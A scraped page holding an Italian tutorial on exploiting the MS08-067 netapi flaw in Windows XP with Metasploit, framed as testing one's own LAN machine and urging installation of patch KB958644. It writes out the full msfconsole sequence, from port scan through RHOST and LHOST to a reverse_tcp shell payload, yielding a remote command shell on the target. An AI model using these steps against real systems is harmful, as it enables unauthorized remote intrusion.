Bucare WindowsXP SP2 con Metasploit

Documenti analoghi
1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, /11/2010

GUIDA ALLE SOLUZIONI

Outlook Express su Windows 7 e 8 (OE everywhere)

ISTRUZIONI PER L INSTALLAZIONE DI MINGW

Il Centro sicurezza PC di Windows Vista Introduzione alla sicurezza

Virtualizzazione VirtualBox su Host Linux

Configurazione del servizio Dynamic DNS. Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio.

Esistono sostanzialmente due metodi per inserire un video online (preso da siti di video sharing come Youtube) in un powerpoint slideshow :

Innanzitutto andiamo sul sito ed eseguiamo il download del programma cliccando su Download Dropbox.

MSI Afterburner APP: controllare la propria scheda video da smartphone o tablet Android HW Legend

Office 2007 Lezione 02. Le operazioni più

File, Modifica, Visualizza, Strumenti, Messaggio

FAQ DI INSTALLAZIONE DI INAZIENDA Rev.2

APRIRE UN PROGRAMMA DI FOGLIO ELETTRONICO

COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO e PARAMETRI2015

1. Informazioni generali sulla modifica. 2. Familiarizzare con la Freestyle Dashboard

Dal sito: Articolo recensito da Paolo Latella

Scegliamo l opzione <salva>

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Aggiungere le funzionalità ACN in Iatros

1. FileZilla: installazione

1 Introduzione Installazione Configurazione di Outlook Impostazioni manuali del server... 10

Kroll Ontrack Servizi RDR Guida rapida

Note di rilascio. Aggiornamento disponibile tramite Live Update a partire dal. Il supporto per Windows XP e Office 2003 è terminato

Il web server Apache Lezione n. 3. Introduzione

Mac Application Manager 1.3 (SOLO PER TIGER)

Scritto da Administrator Martedì 02 Settembre :30 - Ultimo aggiornamento Martedì 10 Maggio :15

Office 2007 Lezione 03

Guida NLite Integrare SP2, driver, aggiornamenti Microsoft, nel cd d installazione di Windows XP

su Windows XP con schede D-Link DWL 650+

Laboratorio di Sistemi Programmare in Php con NetBeans Php. Programmare in Php con Xampp e NetBeans IDE

GUIDA ALL INSTALLAZIONE. Protezione di locale/rete. per il software CADPak su client e server di rete. per la Chiave Hardware Sentinel Hasp

VNC: Guida (parte 1)

Il pacchetto contiene sia l ambiente di sviluppo sia i driver per la scheda.

1 CIRCOLO SPINEA (VE) CORSO CONOSCENZA E MANUTENZIONE DEL COMPUTER APRILE 2010 COME RIPULIRE IL PC UTILIZZANDO UN APPOSITO SOFTWARE

su Windows XP con schede Cisco Aironet 350

TRUCCHI PER GIMP - Elemento a colori in foto bianco e nero

Visual basic base Lezione 01. L'ambiente di sviluppo

Internet Explorer 7. Gestione cookie

SQL Server Express Edition è la novità di Visual Studio.Net versione di SQL Server che presenta la seguenti caratteristiche:

CAPITOLO 1 PREREQUISITI DI INSTALLAZIONE SOFTWARE RICAMBI CAPITOLO 2 PROCEDURA

Come condividere l accesso internet tramite chiavetta HSPDA di 3 (o altro operatore) con un Ipod Touch via WIFI

Office 2007 Lezione 09. Contenuto riutilizzabile

Programma per l elaborazione delle buste paga. dei collaboratori domestici VERSIONE /07/2010

GENERALE. Cos è la rete IRC? Differenza tra Mirc e DeXdcc?

Un caso concreto di risposta ad un attacco hacker

Aggiornamento Agenzie delle Entrate Comunicazione spesometro MyRent Installazione Server Dogma Systems

Puppy Linux (Precise) Live da CD o da USB (Si può usare su PC con 256 MB di RAM)

Sharpdesk V3.3. Guida all installazione Versione

NUOVA PROCEDURA COPIA ED INCOLLA PER L INSERIMENTO DELLE CLASSIFICHE NEL SISTEMA INFORMATICO KSPORT.

Office 2007 Lezione 04. Esportare in PDF

GHPPEditor è un software realizzato per produrre in modo rapido e guidato un part program per controlli numerici Heidenhain.

Rete Mac -Pc. Mac Os X Dove inserire i valori (IP, Subnetmask, ecc) Risorse di Rete (mousedx-proprietà)>

Le Proprietà della Barra delle applicazioni e Menu Start di Giovanni DI CECCA -

Software Rowan Key Manager C400RKM rel.4.xx / C350RKM rel.2.xx

NOTE GENERALI DI PROGRAMMAZIONE icon100

Installazione driver per connessione inverter al PC

Uno dei problemi principali di quando si cerca di copiare un sito web, è che non è possibile a causa di un divieto imposto dal file Robots.txt.

Proteggiamo il PC con il Firewall di Windows Vista

2.1 Configurare il Firewall di Windows

Aggiornamenti Sistema Addendum per l utente

Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti

Amico EVO Manuale dell Installazione

WYSIWYG, INSTALLAZIONE E CONFIGURAZIONE DI UN EDITOR ( A,R )

Biblioteca di Cervia NOZIONI BASE DI INFORMATICA

Guida all installazione ed utilizzo di

INDICE PROGRAMMA CORSO

MIGLIORI SITI CLOUD. Amazon Cloud Drive

Rsync su GNU/Linux e su Windows? (Backup sincronizzato su disco di rete e/o RAID1 su server FreeNAS)

VoipExperts.it SkyStone - Introduzione

COME UTILIZZARE ARCHIVE-HOST

Joomla: Come installarlo e come usarlo. A cura di

SIMULAZIONE CIRCUITI LOGICI CON LOGISIM

Istruzioni installazione mandato Informatico

Lucio Cavalli 4Ti Tecnologie Informatiche. Facciamo chiarezza: Servizi in Cloud Virtualizzazione Server Server Remoti (Hosting / Housing)

GateManager. 1 Indice. tecnico@gate-manager.it

Pratica guidata 10. Attivare misura di sicurezza per il computer. Microsoft Security Essentials e il Firewall di Windows 7

Dal menù a discesa scegliere <proprietà> apparirà finestra <proprietà disco locale C:>

Come Installare SQL Server 2008 R2 Express Edition With Tools

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

GUIDA ALLA CREAZIONE DI UN AUTO AGGIUNTIVA

I tutorial di MadLabs.. Installazione e prima configurazione

Manuale per la configurazione di AziendaSoft in rete

Configuration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1

LaCie Ethernet Disk mini Domande frequenti (FAQ)

Guida Installazione Windows 7

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

D R O P B O X COS È DROPBOX:

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

Transcript:

Bucare WindowsXP SP2 con Metasploit Vulnerabilità ms08_067_netapi Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più sicuro, vista l'introduzione di numerosi bugfix e il sistema di gestione del cosidetto Centro di Sicurezza, che dal service pack 2 si interfaccia e comunica con vari software con il Windows Firewall, e un sistema di aggiornamenti di sistema. Un giornalista di The Register, tale Thomas Greene, ha definito il SP2 una sorta di placebo, volta a calmare, quindi non fixare totalmente i buci scoperti nel SP1. Oggi vi parlerò di una particolare vulnerabilità, denominata dal bollettino sulla sicurezza microsoft: ms_08_067_netapi. Questo bug si trova nel sistema di gestione della dll netapi, che praticamente è alla base di un servizio denominato XML-RPC, che attraverso http, codifica in XML delle richieste di procedure remote tramite TCP/IP. Non vi è però alcun controllo per le richieste inviate a questo servizio, e si è visto che in OS come Windows Server 2003 e Windows Xp, un qualsiasi utente costruendo una richiesta RPC ad hoc, può eseguire codice malevolo senza problemi, in remoto e in tutta tranquillità. Il bug è stato risolto e la patch KB958644 è disponibile per il download sul sito microsoft in particolare a questo indirizzo: http://www.microsoft.com/downloads/details.aspx?familyid=0d5f9b6e-9265-44b9- A376-2067B73D6A03&displaylang=en http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx Come potete vedere dal link sopra evidenziato questo aggiornamento è considerato critico ed indispensabile, per tutti le versioni di Windows. Quindi se non fate aggiornamenti dalla fine del 2008, meglio fare un salto e informarsi meglio. Sfruttare la vulnerabilità Ovviamente quando si è scoperta questa vulnerabilità, sono nati tantissimi exploit capaci di sfruttarla, molti worm e trojan la usano. Oggi in particolare, vi mostrerò come testare su una macchina locale l'exploit che sfrutta il suddetto bug, grazie al framework metasploit (http://metasploit.com), installato su una linuxbox, attraverso la console del framework stesso. Una volta scaricata ed installato il framework, per avviarlo andiamo nella cartella dove lo si è estratto e avviamo la console con il comando $./msfconsole Avremo una schermata come questa:

Bene ecco la vostra shell del framework, visualizziamo gli exploit disponibili: msf > show exploits Ho evidenziato l'exploit che ci interessa...

diamo: msf> use windows/smb/ms08_067_netapi per selezionare l'exploit e msf> show options per vedere le opzioni del nostro exploit come indicato dalle opzioni l'exploit agisce sulla porta 445, la microsoft-ds. Ottimo, con uno scanner vediamo se la 445 del bersaglio è aperta, possiamo usare nmap da metasploit... (ma non solo nmap)

Bene la porta 445 del pc connesso alla mia LAN (192.168.1.2), è aperta e l'os è windows XP, quindi è exploitabile (se non ha effettuato gli opportuni aggiornamenti). Selezioniamolo come RHOST (remote host) msf> set RHOST 192.168.1.2 Bene spegniamo il firewall se l'abbiamo attivato, io ho firestarter e da shell si spegne col comando: msf> sudo firestarter p Ora ciò di cui abbiamo bisogno è un payload compatibile con l'exploit, un payload per chi non lo sapesse è uno speciale shell code che ci permette di usare un servizio, o avviare qualcosa in remoto, sfruttando un'exploit. msf> show payloads Ce ne sono parecchi compatibili con il nostro exploit... quale proviamo? Perchè non una bella reverse shell? Avvieremmo così un cmd.exe in remoto... msf> set payload windows/shell/reverse_tcp

Ora ricontrolliamo le option, vedremo che si sono aggiunte le opzioni del payload, tutte blank da settare: Da completare abbiamo il parametro LHOST (il nostro ip locale...) bene settiamolo come sappiamo fare: msf> set LHOST 192.168.1.14 E ora che abbiamo settato tutto correttamente possiamo avviare l'exploit con il comando: msf> exploit

Uuuuu! Ma quanto ci piace lo stdout??? Ma quanto??? Abbiamo un cmd.exe avviato sulla macchina remota! E' vulnerabile a quanto pare, dobbiamo acchiappare il nostro pc e scaricare l'aggiornamento subito!!! Ma prima diamo due comandi per vedere se effettivamente siamo sulla macchina... Si...i dir vanno a buon fine...siamo a cavallo, e vulnerabili su quel pc. Diamoci una smossa chiudiamo la sessione e affrettiamoci a scaricare l'aggiornamento sopra citato.

vikkio88